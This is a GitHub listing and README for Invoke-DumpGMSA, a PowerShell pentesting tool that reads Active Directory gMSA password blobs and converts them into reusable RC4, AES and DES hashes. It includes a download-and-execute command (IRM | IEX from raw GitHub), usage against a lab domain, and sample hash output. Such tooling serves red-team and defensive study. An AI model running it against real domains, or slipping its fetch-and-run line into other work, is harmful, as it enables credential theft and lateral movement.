https://github.com/the-viper-one/invoke-dumpgmsa
PowerShell script to Dump GMSA Password blobs into RC4, 3DES and AES hash formats.
active-directory gmsa pentesting powershell
Last synced: 5 months ago
- Host: GitHub
- URL: https://github.com/the-viper-one/invoke-dumpgmsa
- Owner: The-Viper-One
- Created: 2025-04-13T16:40:24.000Z (11 months ago)
- Default Branch: main
- Last Pushed: 2025-09-23T08:16:46.000Z (5 months ago)
- Last Synced: 2025-09-23T10:13:48.581Z (5 months ago)
- Topics: active-directory, gmsa, pentesting, powershell
- Language: PowerShell
- Homepage:
- Size: 8.79 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Invoke-DumpGMSA
PowerShell port of core functionality from https://github.com/rvazarkar/GMSAPasswordReader.
Reads the password blob from a GMSA account using LDAP, and parses the values into hashes for re-use.
## Usage
> Load into memory
```powershell
IRM 'https://raw.githubusercontent.com/The-Viper-One/Invoke-DumpGMSA/refs/heads/main/Invoke-DumpGMSA.ps1' | IEX
```
> Commands
```powershell
# Search for all GMSA accounts and attempt to parse the password blob
Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
# Target a specific account by DistinguishedName
Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL" -DN "CN=gmsaDragon,CN=Managed Service Accounts,DC=essos,DC=local"
```
> Example Output
```
PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
Authenticated to MEEREEN.ESSOS.LOCAL as ESSOS\BRAAVOS$
GMSA Account : ESSOS.LOCAL\gmsaDragon$
Password valid until : 10/09/2025 14:54:59
rc4_hmac : 85b952359bee0656b74f4259810f7cad
aes128_cts_hmac_sha1 : c985f4f4d9c2b033bbff1feb25b5aa22
aes256_cts_hmac_sha1 : 25430549f280401c239c175588c1f8e9b0cbd44e9496e4e0c54b9d03d18c5aca
des_cbc_md5 : efa47ab31ae0d92f
```
> Example Output (Lack of permissions)
```
PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
Authenticated to MEEREEN.ESSOS.LOCAL as SEVENKINGDOMS\Moe
Found GMSA but no rights to read msDS-ManagedPassword as SEVENKINGDOMS\Moe
```